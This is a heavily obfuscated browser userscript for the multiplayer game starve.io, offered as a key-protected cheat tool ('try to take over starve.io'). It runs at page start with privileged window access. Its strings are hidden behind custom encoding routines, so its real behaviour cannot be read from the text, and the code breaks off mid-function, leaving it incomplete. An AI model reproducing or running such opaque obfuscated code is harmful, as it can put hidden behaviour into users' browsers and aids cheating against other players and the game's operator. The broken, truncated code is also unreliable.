// ==UserScript==
// @name         LMB Tools Release(Key Protected)
// @version      1.2
// @description  try to take over starve.io
// @author       LMB
// @match        https://starve.io/
// @icon         https://raw.githubusercontent.com/twitter/twemoji/master/assets/svg/2694.svg
// @run-at       document-start
// @grant        unsafeWindow
// ==/UserScript==
var QKZcRD,k8G48O,FlmUjyW,yXZLWW2,ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw;const LT_kr5=[0x0,0x1,0x8,0xff,"length","undefined",0x3f,0x6,"fromCodePoint",0x7,0xc,"push",0x5b,0x1fff,0x58,0xd,0xe,null,0x60,0x61,0x63,0x64,0x59,0x69,0x5a,0x6a,0x7f,0x80,0x83,0x90,0x96,!0x0,0x9f,!0x1,0xb3,0xb4,0xb8,"=",";"," ",0xc4];function tBJ48u(QKZcRD){var k8G48O="+^u0~,|b)dr#G.1?eEW;!8&O[vz>cR5YPKt]n/HMgTjo*_w{X29(LQxN4y3p}Vil:AD$fS`ZICJq\"@kmaBU6=h7%F<s",FlmUjyW,yXZLWW2,ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw;dnSsLOz(FlmUjyW=""+(QKZcRD||""),yXZLWW2=FlmUjyW.length,ilOuWSp=[],qOeh3Ug=LT_kr5[0x0],pDeD_a=LT_kr5[0x0],xya6Dqp=-LT_kr5[0x1]);for(xGquxzw=LT_kr5[0x0];xGquxzw<yXZLWW2;xGquxzw++){var tBJ48u=k8G48O.indexOf(FlmUjyW[xGquxzw]);if(tBJ48u===-LT_kr5[0x1])continue;if(xya6Dqp<LT_kr5[0x0]){xya6Dqp=tBJ48u}else{dnSsLOz(xya6Dqp+=tBJ48u*LT_kr5[0xc],qOeh3Ug|=xya6Dqp<<pDeD_a,pDeD_a+=(xya6Dqp&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(ilOuWSp.push(qOeh3Ug&LT_kr5[0x3]),qOeh3Ug>>=LT_kr5[0x2],pDeD_a-=LT_kr5[0x2])}while(pDeD_a>LT_kr5[0x9]);xya6Dqp=-LT_kr5[0x1]}}if(xya6Dqp>-LT_kr5[0x1]){ilOuWSp.push((qOeh3Ug|xya6Dqp<<pDeD_a)&LT_kr5[0x3])}return jXLK_x(ilOuWSp)}function kHlSG4N(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=tBJ48u(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}dnSsLOz(QKZcRD={},k8G48O=["VfRY!gB]?DUWI?Vjrw?\"SN_^o4e/t/E!iEt(Xf;bc1q$p0","((|b|JsfVp#.DBdMI_QNg{\"wS;d|EIMvLtkbmn+","lt|Lo]N][3A#Oz*MQy6JBB\"t|N7@Y9O]9xs)R{#bGEMmKX}j",",y>Pu}LW}1<R,In5n/|bc6iw@)qaWH+O2_T5l=xu","|GsP`N0S^yL\"e?+55O#IX45Wb","7j5YltKS~:r(D2oz*E=RmS37\"i;3]9aga1k\"K2`J)3GI}I+W=|y|1N(lI!",".zl~>p+","Vf!J@\"@bDd2SCnLtgZGYJ9?.u?","IXlx}}KqoE",";W8J0w%Ryi.At.RRDfrPZi!3d3a`??D5lA{LAm&7fxNc^","1dic=6gWx;em^","|xExdNr7X}SPo1lO0oy(L(+","zJjIQ=r)Q3O\"hvG","I|P5|BSb9;:8fp[t>xZc2Mff)!Kt4?;cSiLR<h_qK?ESwU2MrJ>RY{QOI3$D^","*|jPI9z)Ed]XG6Izd/>P}`e33![(G?FT+24Cy`pRwW","|}ZC=9>{g.reX?oHgoK|oCd^","~}X2kBHn~xTa4XL>(z.N[\",SK?xC9/=g^d|bCXV{X?gpmz)","B|P|UBBR9l&Ax.cRnOCxrn+","?29)rB|jVi,U[>+RfO1bqSiw;}^qY>7g4Z|d","cg!@89yOPdN\"~XNTQ!lL+m~:$dS`e>MH!P3)<6o.3E`23V}]l|SN]xdTsEfW^","T(M|L/6h|:RYX>M;(d\"J<pu`RpDa=[<ed]\"@9395DxE|(37TQ0bdR6+",">}@c]q{qH3xaTISv?Z^",",f8L939g:QTpBaIWzxM|YV5u,","OfVJFp%y6Gi^;HgWAfGb0wqm(ys@O>4]f(;R,IV.!;28}0","%_zP?J~:8;$a)?9>OxURki3f~","4x|d?N|W;G%R2}.!U_iNBNg39GgC2IOT*fi~Yx}3p1Aahnp]","H!}RPx~j^dC]e{Rnfc:xJi^vTiH","M(wb]q];@)","h(SYCykWJi9","t(hbg]JG~dICrzSW8(1b_/8Qc1~mDvfE[Pu","}ZaC(`9w:dUQMuyt[?$)",")wLNNm(T#AD@uVdvL+","QXHL7kPWk)EAmH;>7!O24`2T;;m`^","jRE>mim(N:)q0H>]$+","~?oP&ytWJAC2?uh>TJtP89E]$yd|D2RO{(6)^nkwCiAC<~d","r2dI%\"<E7.+q{>u/g/YL#6<y#EJ#46#v<(6PD=cnpi(pH.5OL|s)","Yw5dT{G7wDZCgpRn.l^","@1~90wD|<iv|{3H/#ZzRuBB]2D8rf>r!`_u","%XJ@}Q>Q*E@@G>t[|RNC,Xr[J1efl6bHYJRJ0t>b+lp#e6$Y","(ZfZ)75uAG?I^e55zx=bnVy]*EXL%1CML(.\"pw`GX}D`#MqHOd|b[\"Zb|","F(I(\"XJ[83A)ynAE<j7Z;9QOipVLOU);Zd3P!ZFtX}[","O(l2n{Hn2G~U,IWgHR+x}Qk|q)x","$/|Y@_nW0yqRa?i[r~e|aZJ|L;","WyEqvL,v7.t\"|/V]PGT(y`DG,.Q[G{\";M|1N}IZy0xE.Yu?z!lMxV}4LXynL^","J/OK,IH5t}5IEnV]3Z>r66*:^y$@l>oH3A[5@\"$.WlYA[0","0J>P6_+","cz7ZT2^]S;t1F6?zN+","nOPC.nPJriPm33gWspu","<A@LT/mh:W>XkS%&Wy)|6yQ^o)rVwVREbybL&hE{Wy+!mu","8yI2f}CToAhPc>xtb2u(94^]qi{YYzFjU/<|<LSRLy{p^}PWrZ^","!x7\"qNf5Blp2:?SW6vRrzkV{b!7Gxvu/:ia|^Xf5_pa}9.Fjs_HCAn@S~","}/wcVMv]W;ib[>dHf0g57y..0","~PFd1J%bM3;mDHl/PJ@9//F[X}[[tVUgy(&\"R{W3[3NChaTMAY1N|SI7PD4","zoEx{(<T).RtN`\";D(09d7+","]??dP{ULg3s;&/G;0]0RK2WL31&/e{K[_Zu,!ZJ[f:?mrUp]~2&~>","ryvPpm5nXWRXSnKY$YE5CiHax3=}(`A/!lId","P})(rnj5`3w[W,:Oul.\"aHmlvEYIUv*v",")GI2#J9uW;PpH2TMjzs(_l:5YGoDH2a>8JSNM{QlRpH\"(`YRW|T>$J;^","g0jq]q+","FX6z[p}5Kx+Ic>,5kv\"@}MdT5D2COH<T%+","[zxcTqIJ|","Hy.rByz:pp>XW,f5`!oR?6jw{lBQ~0H/\"(P>`9J5YDZazuZWpE_bym1u,xU$+","{(^>FKi5{}lc61cR;RH~SIpSA?4~EeijU+","S/WP@BD|K?,3vXBM,2k25{Ug[EMb!?{z$tcR~ILfj!G5|V5R0DA|","@A~JRh,Qg.BvW,","h`fb/hKb];/rsSYOk#=JW","Ngj>eNKleW0twvfH:O9Po4>]K?9\"4n0/Ag~r|B|nv1+>`SNtwZ^qjqQbx.","CX~@E\"hO`:Z}~Z?MDX5N/g?.]d","_thZ_ay^","Atd5//rWj1Yie0b","^y?KbNqb1p%v)0jMF_8NkJ/y>ELS8et/;P7bo(`[,3{246MYZ|8Ns_Z^",">xGrQ4eL|NFJf~=t6c0,92X3F.]8A~nY*/P5YxYlc1Ll*>]E@cjI/{9w|","f0$@)mPuwQ5EyIf5$(k2aZ]SpAql^","H0d(\"NK]sA\"WvX?z;zI2l3/;0","!}Z|(UUGZ!M1IZ//A(gC?9\"L>1e(Z1fH71w\"An=Gg.N2>H<OK|(@kJd;{4rO^","Ji)k]pM.\"Em&$UlOz}~YDJ7[~:dfn{m>YJ(@@_8RM.>","ptf,aB1n6d*16`0EipCxptcG|rt","6p$zU\"jLS:|myvs&=M^|","fia|dNkgH;)x\"p(>CXB|?ZY{$}9","rg&~*l/]0G0dUvTMLdi~YL^B}i8S{6Ftrw`N@nLf~","Hx?\"!L=3]GO|.}55,Re5xl2;y1B&@noH~o^kXM,B`3OX^","}i7ZZB\"|O.wNM1HvyZqJrBVTdE{[4?%T","??wYp@!urA#f%z7g5^","3I]FYw>R","$m7::~[",">5LH#;4VfL:ORZf","O(Wwmi#A","}2*[z0*dB","ImN(KukM",".u6|6","bZ6|^)kt[&BW4P:{.iIS","2[};KVT,ROQfG#N!iilB","}gZ*[5=A","5?\",fKt7^}$A1","&o:]5vk21Bjd1","VoXP2O_.7w2k1","v+@|ox~69]o8?gcX","@75S","q5h|OVv6S&F/6I","=>:S6gy","`H$S,g$.4","Zk5FLG!k5FLG!k5FOsE7w~~VDW_I(WP:L{:kn)=s_kn{6GNiyJSMvkYIg);,[&h#_Z2^HhYI(fVC^Yef+A.O`zgaO4]ylAHK]ylAHK]yZ|xqwMGehlV`=&kPJHUQ#ktpor?y(9>KlnI*\")@jI5.jp~rc.F0OWC9sHp!k5FLG!k5FLG!kT_HXH7j|<|C25\"DCV`P&1BTEtxu$MSHjF^rmg5KJ~g.\".S5`?gcXQ+&Ixc>+5\"HC1L6G0a=LKX+>>IOz5FLG!k5FLG(OfHtxQ!ZD,WF^+&fECE^xnOROLWN@Hp!k5FLG!k5F","Zk5FLG!k5FLG!k)NK!p~JH!V|x%O6z(Id5|i&IVVW,_D.e9L6G>%VJlM0GE\",+07<id96|C#1W_Ilw9sHp!k5FLG!k5FLG!k4)|[2ED|HalM.S8w5FbG3%VJRKxM}D13[W]Yjk[W]Yjk[W]Yjk>qkO5RlA~g$.yE@Dm);@_k3_;@|iCoO4]ylAHK]ylA","`X\"~MtB,H$@","Zk5FLG!k5FLG!k@j%mCkdP][Ni5PQR{$Y8.ey/Os!;lA>M/niZQf075Gxh:Slg8$]I]Y)AEb@u9oj[9jVB5h5FLG!k5FLG!k5F$(`X{~#x\"N~(_CY.RX>QK*HK;,1S:_]iR.&jbS(,vkp~xq(/E\"(+07*(Xh8J~gjA}vhlAI@7XgAp?tOE4]~2zF,!~Z.Hw1.FWBgw9s6G>7lB[f.F;BlwT9)&TmCEQ14x<4%vGPOs|;6.L{u/MSy=mLb{Q+ZIP!u/ePwvF^}{1B(RxqLF,Dca:_&XZ++BG;M\".SbfT9)&aTxyLG!k5FLG!k5FLG7dd*Y4]ylAHK]ylAHK]yLPP#I.H\"3z>`E(Z!>HQ_u$`YwtT/R@mkdP][Ni5PVVW,_D.e9L6GPzVJRKJFv\"%)i{.M]HfHJMvkL~%oD6Ge6z+i2!n&CoE#T,kC%v=)(X_kPj>NHOD9>MEOE\"]v=L6G;N,J~gLF,Dca:_&X_k*)l@doR/6VF.lOT8,^L{(_h*_K$FOv6zN)l@o5>~B2UW:P&RT9)&aT46Mtdm|(XvC_2XuueHY4]ylAHK]ylAHK]y7I;K;,1S4D}L\"L+H%~]1u$_Paf|P_{LdJ~Xt#C@]{fx9P&^=:9]TLF?D}e!:#Ms7BJnx.F,DzDi@6G/7\"~,fVC^Yef+A>O`zJVd,tQLBl0Xy%IOz5FLG~y","4j{~Wo4\"|8[D59","Yiw~$RrllOQfihR.JF","q5_E,g$EF8up>1$","o!gR/ly","Ki^r+oH6u&","Ki^rBny","Ki:S","$Xw~Mty",")Xf\"{20$Zr@*`","ILr*]n!fO2D_b","=k2B9=TM","Iw`K^CJA","~SxcI/pibN#jb","/s;c]H{Ou8]ZD","$_2R&ikabx>y,6j^d\"xHM>|?c&{ynkk6ugTxv>sP8YduchK;Y/zJJsKXSQChc|C8DKkg/it,5_1<_6v&shM/#07(B.|D%jI$uNZH]$Q*Mzzwn~gX4%Wgi|B.][|y|h!&Q_8>*_t!6O|yu","?$tHZc>9Q","W3dm=>&iHKK7u","O(Wwmi%=gFmCS|a\"","FN(%~<:A","o,.n","Xq1`u","Es4e!hNDP/<xt^D53Ok","_|rXmy=","ul8E8","DL1`IBD\"E):r5W","X]WB_w+d","X5)iinBdRw","<T`$=o@[9xg?t","1WsV[r|[rx","CS8i4PXE","^*;7`UWu","|8sxb","FnQfbjBAt2gxr6S@foMYv>pAz3bxO","}|kNG[nDH9uuo","wtxR!","RwAQ>","yEc,g<K","%P}pn6*","+<rPHgg?J(#SxM$h|Pr/fge?o>@jy]Qo4n#\"fg3(o~[%yw&","nXzoK/x__B@HX./t]8","YXfx[*j,9F","!Aqoo5i","{[|gJ","G;.gY5;>KEc$8","G;\"?l5K?8d9qQPK","M&>o2ySljK+","YWYD*XG*xGOB*z4lzGg_;8%yz0.BJl&lQ{`","!Y45186","T^{i^V6","dUBA=e0y","PNh!~5ml#d3)xf_+p&aMI","=Qr!,5i","49A*9yi","|[+g,","+4NoBG),NB","Ug+gh9i",".b4bY","dSI8_9d}",";]|tY%c(z","Aq&v%aVl[","u*./P<Nii@fd*}<sQ%","DE}q@(FB|o%`Bb","=*Tj18oA","74LQ",":]zyv,Y3RD1","IoyKU}18w`Hi8f423PdR!Q}sp+)e_SuOcFDnOa[M:+>i/UG","pH>n8a|","!5G65,|","LUVY",".[EoMyCfxb9","@3@^j[ej~SH&U`,pxO>x>BZbR&%:A+iASSwt#BfVZkS<$.a|?j)oo$9Wd&y:0`k[sN","2@`UV#N","OZc;ZyN","Yn3C","eNjHC~VajC","!f(%$T&q/","!1=wJhRPdK3Bu","T%@,&(|<Q","x@}woRA?","YV}T","n)}TMY<<KW","AdbIZAwq>p~`n4M)","Q%yjAq=?","K?>W","y~5M!tRF","m/0%UDO=/","bfLwGHeDfY)KYdd}f_I","z8)N_h+93#.","wd0[]D%=/","Xt`%|iMc/","e#F#:MQ","YtjN6","A]g]6","z1s_I>za","FIrjZJbu9","[#f5","$21v,aRXglvmx","yJ1nUbq]","5rgZF!=T;2^j6",">J!dlgQ","szKG@AQV","oZuni^%<jbW|T","+|1J;$jA","g8UbwzvP&tWHo"]);function YS5C61(){var QKZcRD=[function(){return globalThis},function(){return global},function(){return window},function(){return new Function("return this")()}],k8G48O,FlmUjyW,yXZLWW2;dnSsLOz(k8G48O=void 0x0,FlmUjyW=[]);try{dnSsLOz(k8G48O=Object,FlmUjyW[LT_kr5[0xb]]("".__proto__.constructor.name))}catch(ilOuWSp){}uMJapP3:for(yXZLWW2=LT_kr5[0x0];yXZLWW2<QKZcRD[LT_kr5[0x4]];yXZLWW2++)try{var qOeh3Ug;k8G48O=QKZcRD[yXZLWW2]();for(qOeh3Ug=LT_kr5[0x0];qOeh3Ug<FlmUjyW[LT_kr5[0x4]];qOeh3Ug++)if(typeof k8G48O[FlmUjyW[qOeh3Ug]]===LT_kr5[0x5])continue uMJapP3;return k8G48O}catch(ilOuWSp){}return k8G48O||this}dnSsLOz(FlmUjyW=YS5C61()||{},yXZLWW2=FlmUjyW.TextDecoder,ilOuWSp=FlmUjyW.Uint8Array,qOeh3Ug=FlmUjyW.Buffer,pDeD_a=FlmUjyW.String||String,xya6Dqp=FlmUjyW.Array||Array,xGquxzw=function(){var QKZcRD=new xya6Dqp(LT_kr5[0x1b]),k8G48O,FlmUjyW;dnSsLOz(k8G48O=pDeD_a[LT_kr5[0x8]]||pDeD_a.fromCharCode,FlmUjyW=[]);return function(yXZLWW2){var ilOuWSp,qOeh3Ug,xya6Dqp,xGquxzw;dnSsLOz(qOeh3Ug=void 0x0,xya6Dqp=yXZLWW2[LT_kr5[0x4]],FlmUjyW[LT_kr5[0x4]]=LT_kr5[0x0]);for(xGquxzw=LT_kr5[0x0];xGquxzw<xya6Dqp;){dnSsLOz(qOeh3Ug=yXZLWW2[xGquxzw++],qOeh3Ug<=LT_kr5[0x1a]?ilOuWSp=qOeh3Ug:qOeh3Ug<=0xdf?ilOuWSp=(qOeh3Ug&0x1f)<<LT_kr5[0x7]|yXZLWW2[xGquxzw++]&LT_kr5[0x6]:qOeh3Ug<=0xef?ilOuWSp=(qOeh3Ug&0xf)<<LT_kr5[0xa]|(yXZLWW2[xGquxzw++]&LT_kr5[0x6])<<LT_kr5[0x7]|yXZLWW2[xGquxzw++]&LT_kr5[0x6]:pDeD_a[LT_kr5[0x8]]?ilOuWSp=(qOeh3Ug&LT_kr5[0x9])<<0x12|(yXZLWW2[xGquxzw++]&LT_kr5[0x6])<<LT_kr5[0xa]|(yXZLWW2[xGquxzw++]&LT_kr5[0x6])<<LT_kr5[0x7]|yXZLWW2[xGquxzw++]&LT_kr5[0x6]:(ilOuWSp=LT_kr5[0x6],xGquxzw+=0x3),FlmUjyW[LT_kr5[0xb]](QKZcRD[ilOuWSp]||(QKZcRD[ilOuWSp]=k8G48O(ilOuWSp))))}return FlmUjyW.join("")}}());function jXLK_x(QKZcRD){return typeof yXZLWW2!==LT_kr5[0x5]&&yXZLWW2?new yXZLWW2().decode(new ilOuWSp(QKZcRD)):typeof qOeh3Ug!==LT_kr5[0x5]&&qOeh3Ug?qOeh3Ug.from(QKZcRD).toString("utf-8"):xGquxzw(QKZcRD)}function GV8SE2(){}function d7xJ7v(FlmUjyW,yXZLWW2=LT_kr5[0x1]){function ilOuWSp(FlmUjyW){var yXZLWW2="[CR7md}x!|$#f_BIv.g\"]?u3tn>k8%V2:aW^4{z<r*p5&,EPOlK1D0Ho=9cGQZUeTL/syhj~S6;M+FYAbw)qiJ`@NX(",ilOuWSp,qOeh3Ug,QKZcRD,k8G48O,pDeD_a,xya6Dqp,xGquxzw;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,QKZcRD=[],k8G48O=LT_kr5[0x0],pDeD_a=LT_kr5[0x0],xya6Dqp=-LT_kr5[0x1]);for(xGquxzw=LT_kr5[0x0];xGquxzw<qOeh3Ug;xGquxzw++){var tBJ48u=yXZLWW2.indexOf(ilOuWSp[xGquxzw]);if(tBJ48u===-LT_kr5[0x1])continue;if(xya6Dqp<LT_kr5[0x0]){xya6Dqp=tBJ48u}else{dnSsLOz(xya6Dqp+=tBJ48u*LT_kr5[0xc],k8G48O|=xya6Dqp<<pDeD_a,pDeD_a+=(xya6Dqp&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(QKZcRD.push(k8G48O&LT_kr5[0x3]),k8G48O>>=LT_kr5[0x2],pDeD_a-=LT_kr5[0x2])}while(pDeD_a>LT_kr5[0x9]);xya6Dqp=-LT_kr5[0x1]}}if(xya6Dqp>-LT_kr5[0x1]){QKZcRD.push((k8G48O|xya6Dqp<<pDeD_a)&LT_kr5[0x3])}return jXLK_x(QKZcRD)}function qOeh3Ug(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=ilOuWSp(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}Object[kHlSG4N(0x52)](FlmUjyW,qOeh3Ug(0x53),{[qOeh3Ug(0x54)]:yXZLWW2,[qOeh3Ug(0x55)]:LT_kr5[0x21]});return FlmUjyW}function dnSsLOz(){dnSsLOz=function(){}}(function(){var FlmUjyW,yXZLWW2;function ilOuWSp(FlmUjyW){var yXZLWW2="ouAIg~/Q[NRV1*nt6&X4#2L8),3b+!=w%Mv}5$W^\"U;f{]Zqjy:(9xzJ@_.0dkKCFYO`T?h|B7rcHm><DipEsaPlSGe",ilOuWSp,qOeh3Ug,pDeD_a,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N;dnSsLOz(ilOuWSp=""+(FlmUjyW||""),qOeh3Ug=ilOuWSp.length,pDeD_a=[],xya6Dqp=LT_kr5[0x0],xGquxzw=LT_kr5[0x0],tBJ48u=-LT_kr5[0x1]);for(kHlSG4N=LT_kr5[0x0];kHlSG4N<qOeh3Ug;kHlSG4N++){var YS5C61=yXZLWW2.indexOf(ilOuWSp[kHlSG4N]);if(YS5C61===-LT_kr5[0x1])continue;if(tBJ48u<LT_kr5[0x0]){tBJ48u=YS5C61}else{dnSsLOz(tBJ48u+=YS5C61*LT_kr5[0xc],xya6Dqp|=tBJ48u<<xGquxzw,xGquxzw+=(tBJ48u&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(pDeD_a.push(xya6Dqp&LT_kr5[0x3]),xya6Dqp>>=LT_kr5[0x2],xGquxzw-=LT_kr5[0x2])}while(xGquxzw>LT_kr5[0x9]);tBJ48u=-LT_kr5[0x1]}}if(tBJ48u>-LT_kr5[0x1]){pDeD_a.push((xya6Dqp|tBJ48u<<xGquxzw)&LT_kr5[0x3])}return jXLK_x(pDeD_a)}function qOeh3Ug(FlmUjyW){if(typeof QKZcRD[FlmUjyW]===LT_kr5[0x5]){return QKZcRD[FlmUjyW]=ilOuWSp(k8G48O[FlmUjyW])}return QKZcRD[FlmUjyW]}dnSsLOz(FlmUjyW=Object[qOeh3Ug(0x56)](LT_kr5[0x11]),yXZLWW2=void 0x0);function pDeD_a(ilOuWSp,qOeh3Ug,xya6Dqp,xGquxzw={},tBJ48u,kHlSG4N,YS5C61,FGqp_v,Ze0ESTw){if(!YS5C61){YS5C61=function(){var ilOuWSp=function(ilOuWSp,xya6Dqp){var xGquxzw=[],tBJ48u;dnSsLOz(tBJ48u=ilOuWSp.length,ilOuWSp.sort((ilOuWSp,xya6Dqp)=>ilOuWSp-xya6Dqp),qOeh3Ug(xGquxzw,[],LT_kr5[0x0],tBJ48u,ilOuWSp,xya6Dqp));return xGquxzw},qOeh3Ug;dnSsLOz(qOeh3Ug=function(ilOuWSp,xya6Dqp,xGquxzw,tBJ48u,kHlSG4N,YS5C61){var FGqp_v=LT_kr5[0x11],Ze0ESTw;if(YS5C61<LT_kr5[0x0])return;if(YS5C61===LT_kr5[0x0])return ilOuWSp.push(xya6Dqp);for(Ze0ESTw=xGquxzw;Ze0ESTw<tBJ48u;Ze0ESTw++){if(kHlSG4N[Ze0ESTw]>YS5C61)break;if(Ze0ESTw>xGquxzw&&kHlSG4N[Ze0ESTw]===kHlSG4N[Ze0ESTw-LT_kr5[0x1]])continue;dnSsLOz(FGqp_v=Array.from(xya6Dqp),FGqp_v.push(kHlSG4N[Ze0ESTw]),qOeh3Ug(ilOuWSp,FGqp_v,Ze0ESTw+LT_kr5[0x1],tBJ48u,kHlSG4N,YS5C61-kHlSG4N[Ze0ESTw]))}},console.log(ilOuWSp))}}if(!kHlSG4N){kHlSG4N=function(ilOuWSp){if(typeof QKZcRD[ilOuWSp]===LT_kr5[0x5]){return QKZcRD[ilOuWSp]=tBJ48u(k8G48O[ilOuWSp])}return QKZcRD[ilOuWSp]}}if(!tBJ48u){tBJ48u=function(ilOuWSp){var qOeh3Ug="`bMA)<>BRGHVNxvr+Z%q:W_Xtp[\"I}6{yl0jhu@wTfKU,Sd/kYO7^i2(PeCFQ8=]zL#~Eg&m;!c5*oJn391.Da$?4s|",xya6Dqp,xGquxzw,tBJ48u,kHlSG4N,YS5C61,FGqp_v,Ze0ESTw;dnSsLOz(xya6Dqp=""+(ilOuWSp||""),xGquxzw=xya6Dqp.length,tBJ48u=[],kHlSG4N=LT_kr5[0x0],YS5C61=LT_kr5[0x0],FGqp_v=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<xGquxzw;Ze0ESTw++){var NHoMtb8=qOeh3Ug.indexOf(xya6Dqp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(FGqp_v<LT_kr5[0x0]){FGqp_v=NHoMtb8}else{dnSsLOz(FGqp_v+=NHoMtb8*LT_kr5[0xc],kHlSG4N|=FGqp_v<<YS5C61,YS5C61+=(FGqp_v&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(tBJ48u.push(kHlSG4N&LT_kr5[0x3]),kHlSG4N>>=LT_kr5[0x2],YS5C61-=LT_kr5[0x2])}while(YS5C61>LT_kr5[0x9]);FGqp_v=-LT_kr5[0x1]}}if(FGqp_v>-LT_kr5[0x1]){tBJ48u.push((kHlSG4N|FGqp_v<<YS5C61)&LT_kr5[0x3])}return jXLK_x(tBJ48u)}}if(kHlSG4N(0x57)in GV8SE2){YS5C61()}dnSsLOz(FGqp_v=void 0x0,Ze0ESTw={[kHlSG4N(LT_kr5[0xe])]:function(ilOuWSp,qOeh3Ug){if(!qOeh3Ug){qOeh3Ug=function(qOeh3Ug){if(typeof QKZcRD[qOeh3Ug]===LT_kr5[0x5]){return QKZcRD[qOeh3Ug]=ilOuWSp(k8G48O[qOeh3Ug])}return QKZcRD[qOeh3Ug]}}if(!ilOuWSp){ilOuWSp=function(ilOuWSp){var qOeh3Ug="yFAp9Id4BJSGZ$hi^OY\"&(KN,.7L}b6|~r!{m5@sXM[uUzj/=`P+CEH*3>W%_:D8]evwQqag1f;lRoVntx#)Tc20?<k",xya6Dqp,xGquxzw,tBJ48u,kHlSG4N,YS5C61,FGqp_v,Ze0ESTw;dnSsLOz(xya6Dqp=""+(ilOuWSp||""),xGquxzw=xya6Dqp.length,tBJ48u=[],kHlSG4N=LT_kr5[0x0],YS5C61=LT_kr5[0x0],FGqp_v=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<xGquxzw;Ze0ESTw++){var NHoMtb8=qOeh3Ug.indexOf(xya6Dqp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(FGqp_v<LT_kr5[0x0]){FGqp_v=NHoMtb8}else{dnSsLOz(FGqp_v+=NHoMtb8*LT_kr5[0xc],kHlSG4N|=FGqp_v<<YS5C61,YS5C61+=(FGqp_v&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(tBJ48u.push(kHlSG4N&LT_kr5[0x3]),kHlSG4N>>=LT_kr5[0x2],YS5C61-=LT_kr5[0x2])}while(YS5C61>LT_kr5[0x9]);FGqp_v=-LT_kr5[0x1]}}if(FGqp_v>-LT_kr5[0x1]){tBJ48u.push((kHlSG4N|FGqp_v<<YS5C61)&LT_kr5[0x3])}return jXLK_x(tBJ48u)}}if(!document[qOeh3Ug(LT_kr5[0x16])]){function xya6Dqp(ilOuWSp){var qOeh3Ug="R1NFHXGblYPWB:c\"3#J.D%A~[kUn5`a|Zu@dx0=_i7z4*oIv(M^O82}9h<w>ygSfq?j&TV6mCt]e,LpKQE+)$;/{rs!",xya6Dqp,xGquxzw,tBJ48u,kHlSG4N,YS5C61,FGqp_v,Ze0ESTw;dnSsLOz(xya6Dqp=""+(ilOuWSp||""),xGquxzw=xya6Dqp.length,tBJ48u=[],kHlSG4N=LT_kr5[0x0],YS5C61=LT_kr5[0x0],FGqp_v=-LT_kr5[0x1]);for(Ze0ESTw=LT_kr5[0x0];Ze0ESTw<xGquxzw;Ze0ESTw++){var NHoMtb8=qOeh3Ug.indexOf(xya6Dqp[Ze0ESTw]);if(NHoMtb8===-LT_kr5[0x1])continue;if(FGqp_v<LT_kr5[0x0]){FGqp_v=NHoMtb8}else{dnSsLOz(FGqp_v+=NHoMtb8*LT_kr5[0xc],kHlSG4N|=FGqp_v<<YS5C61,YS5C61+=(FGqp_v&LT_kr5[0xd])>LT_kr5[0xe]?LT_kr5[0xf]:LT_kr5[0x10]);do{dnSsLOz(tBJ48u.push(kHlSG4N&LT_kr5[0x3]),kHlSG4N>>=LT_kr5[0x2],YS5C61-=LT_kr5[0x2])}while(YS5C61>LT_kr5[0x9]);FGqp_v=-LT_kr5[0x1]}}if(FGqp_v>-LT_kr5[0x1]){tBJ48u.push((kHlSG4N|FGqp_v<<YS5C61)&LT_kr5[0x3])}return jXLK_x(tBJ48u)}function xGquxzw(ilOuWSp){if(typeof QKZcRD[ilOuWSp]===LT_kr5[0x5]){return QKZcRD[ilOuWSp]=xya6Dqp(k8G48O[ilOuWSp])}return QKZcRD[ilOuWSp]}document[qOeh3Ug(LT_kr5[0x18])](qOeh3Ug(LT_kr5[0xc]),new pDeD_a(qOeh3Ug(0x5c),xGquxzw(0x5d),xGquxzw(0x5e))[xGquxzw(0x5f)]);return}const tBJ48u=document[qOeh3Ug(LT_kr5[0x12])](qOeh3Ug(LT_kr5[0x13]));dnSsLOz(tBJ48u.id=qOeh3Ug(0x62),tBJ48u[qOeh3Ug(LT_kr5[0x14])][qOeh3Ug(LT_kr5[0x15])]=qOeh3Ug(0x65));const kHlSG4N=document[qOeh3Ug(LT_kr5[0x12])](qOeh3Ug(LT_kr5[0x13]));dnSsLOz(kHlSG4N[qOeh3Ug(LT_kr5[0x14])][qOeh3Ug(LT_kr5[0x15])]=qOeh3Ug(0x66),kHlSG4N[qOeh3Ug(0x67)]=qOeh3Ug(0x68),tBJ48u[qOeh3Ug(LT_kr5[0x17])](kHlSG4N),document[qOeh3Ug(LT_kr5[0x16])][qOeh3Ug(LT_kr5[0x17])](tBJ48u),document[qOeh3Ug(LT_kr5[0x19])](qOeh3Ug(0x6b))[qOeh3Ug(LT_kr5[0x18])](qOeh3Ug(0x6c),Gpx24X5),document[qOeh3Ug(LT_kr5[0x19])](qOeh3Ug(0x6d))[qOeh3Ug(LT_kr5[0x18])](qOeh3Ug(0x6e),ilOuWSp=>{if(ilOuWSp[qOeh3Ug(0x6f)]===qOeh3Ug(0x70)){Gpx24X5()}}))}});if(qOeh3Ug===kHlSG4N(0x71)){yXZLWW2=[]}if(qOeh3Ug===kHlSG4N(0x72)){function NHoMtb8(){var qOeh3Ug,xya6Dqp;if(kHlSG4N(0x73)in GV8SE2){tBJ48u()}function tBJ48u(){var qOeh3Ug=function(qOeh3Ug){var 